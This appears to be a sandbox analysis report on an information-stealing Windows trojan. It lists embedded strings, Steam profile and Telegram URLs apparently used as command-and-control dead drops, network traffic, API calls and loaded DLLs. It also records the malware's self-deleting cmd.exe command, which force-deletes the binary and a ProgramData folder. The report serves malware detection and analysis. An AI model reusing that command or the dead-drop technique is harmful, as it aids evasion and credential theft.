Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&amp
Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
                            Source: 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFm
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/toolti
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
                            Source: njrtdhadawt.exe, chrome.dll.0.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://help.steampowered.com/en/
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                            Source: 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/Y
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                            Source: njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%d-
                            Source: 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199794498376
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
                            Source: njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                            Source: njrtdhadawt.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199794498376
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199794498376)
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199794498376/badges
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199794498376/inventory/
                            Source: njrtdhadawt.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199794498376idr7ffMozilla/5.0
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
                            Source: 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                            Source: 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://t.me/a
                            Source: njrtdhadawt.exeString found in binary or memory: https://t.me/asg7rd
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/asg7rdU_
                            Source: njrtdhadawt.exeString found in binary or memory: https://t.me/asg7rdidr7ffsqlo.dllMozilla/5.0
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/nj
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/zj
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo_2x.png
                            Source: njrtdhadawt.exe, 00000000.00000003.1510994054.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: C:\Users\user\Desktop\njrtdhadawt.exe | Code function: 0_2_00FE829D _memset,wsprintfA,OpenDesktopA,CreateDesktopA,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcpyA,_memset,CreateProcessA,Sleep,CloseDesktop,0_2_00FE829D

System Summary

Source: njrtdhadawt.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\njrtdhadawt.exe | Code function: 0_2_00FE144B GetCurrentProcess,NtQueryInformationProcess,0_2_00FE144B
Source: C:\Users\user\Desktop\njrtdhadawt.exe | Code function: 0_2_6CD50DE0 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_6CD50DE0
Source: Joe Sandbox View; Dropped File: C:\ProgramData\chrome.dll 81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: String function: 6CD6FDB0 appears 38 times
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: String function: 6CD61380 appears 33 times
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: String function: 00FE47D9 appears 38 times
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: String function: 6CD5D850 appears 90 times
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: String function: 00FF082C appears 69 times
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: String function: 00FF070A appears 36 times
Source: njrtdhadawt.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@6/3@2/2
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF16C8 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00FF16C8
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Code function: 0_2_00FF197A __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z,__EH_prolog3_catch,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString, 0_2_00FF197A
Source: C:\Users\user\Desktop\njrtdhadawt.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\76561199794498376[1].htm
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Users\user\Desktop\njrtdhadawt.exe; File created: C:\Users\user~1\AppData\Local\Temp\delays.tmp
Source: njrtdhadawt.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\njrtdhadawt.exe; File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: njrtdhadawt.exe; ReversingLabs: Detection: 71%
Source: unknown; Process created: C:\Users\user\Desktop\njrtdhadawt.exe "C:\Users\user\Desktop\njrtdhadawt.exe"
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exit
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: wininet.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: dbghelp.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: wldp.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: profapi.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: netutils.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: schannel.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\njrtdhadawt.exe; Section loaded: wbemcomn.dll
